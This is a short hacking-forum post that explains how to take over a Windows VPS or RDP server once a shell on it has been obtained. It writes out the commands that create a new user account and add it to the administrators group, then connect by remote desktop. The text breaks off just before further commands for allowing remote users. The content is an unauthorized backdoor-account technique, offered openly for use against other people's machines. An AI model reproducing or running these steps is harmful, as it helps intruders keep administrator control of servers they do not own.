hello to all my ABH brothers today am gonna show u how to hack a RDP/VPS from shell...well i dont find any tutorial posted regarding to this so i posted....so i give credits to original founder of this tut name is Ninja
First execute command on shell >
Code:
net user l33t p4$sword /add
l33t=username p4$sword=password
After execution the shell will give you a result like this :
Code:
The command completed successfully.
The user has been added with success now we need to add it on administrators group.
Attention:If the VPS Has an your unknown Language use google translate ( AutoDetect ).
Now to add administrator access to your user >
Code:
net localgroup administrators l33t /add
After execution connect to the VPS
If the VPS Have an static ip but doesn’t connect on (mstsc) use these commands to allow remote users :